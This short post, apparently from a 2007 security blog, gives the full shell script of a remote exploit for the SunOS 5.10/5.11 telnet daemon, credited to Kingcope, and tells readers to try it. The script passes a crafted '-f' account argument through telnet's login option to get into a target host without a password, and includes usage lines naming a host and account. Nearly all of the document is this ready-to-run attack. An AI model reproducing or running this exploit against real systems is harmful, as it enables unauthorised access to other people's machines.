SunOS 5.10/5.11 owned, really!
Tuesday, February 13th, 2007Try it or get more details.
#!/bin/sh
echo ""
echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@gmx.net"
if [ $# -ne 2 ]; then
echo “./sunos HOST ACCOUNT”
echo “e.g.: ./sunos localhost bin”
exit
fi
telnet -l”-f$2″ $1